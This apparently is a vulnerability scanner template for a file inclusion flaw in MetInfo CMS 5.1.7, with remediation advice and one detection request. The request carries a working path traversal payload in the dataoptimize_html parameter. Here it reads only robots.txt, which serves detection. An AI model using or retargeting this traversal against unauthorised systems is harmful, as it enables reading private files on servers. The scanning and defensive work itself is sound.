id: Metinfo-V5_1_7-LFI
info:
  name: MetInfo 5.1.7 LFI vulnerability
  author:
  - l0ne1y
  description: |-
    MetInfo 5.1.7 file inclusion vulnerability.
    MetInfo is an open-source, free CMS building system suitable for enterprise websites. The MetInfo enterprise website management system is mainly used to build enterprise websites and uses a PHP+Mysql architecture.

    Metinfo-V5.1.7 has a file inclusion vulnerability on some pages. An attacker can exploit it to include arbitrary files.
  reference:
  - http://www.wooyun.org/bugs/wooyun-2015-0159386
  severity: critical
  remediation: |-
    Remediation:
    Official Fix:<br />1. Upgrade to a non-vulnerable version of the system, or download the security patch from the official site.
    https://www.mituo.cn/


    Temporary Fix:<br />1. Filter ".", preventing users from traversing to parent directories in the URL.<br />2. Use strict regular-expression validation of user-input parameter formats. Hard-code or uniformly encode filename parameters passed by the user, use a whitelist for file types, and reject parameters containing malicious or null characters.<br />3. Disable directory traversal services; for example, configure open_basedir in php.ini to restrict file access scope.<br />4. Store file paths in the database and let users download files by submitting the corresponding file ID.<br />5. Verify permissions before allowing a user to download a file.
requests:
- matchers:
  - type: dsl
    dsl:
    - status_code==200 && contains(body,"Disallow:") && contains(body,"User-agent:")
  matchers-condition: and
  path:
  - '{{BaseURL}}/index.php?index=a&skin=&dataoptimize_html=/../../../robots.txt'
  method: GET
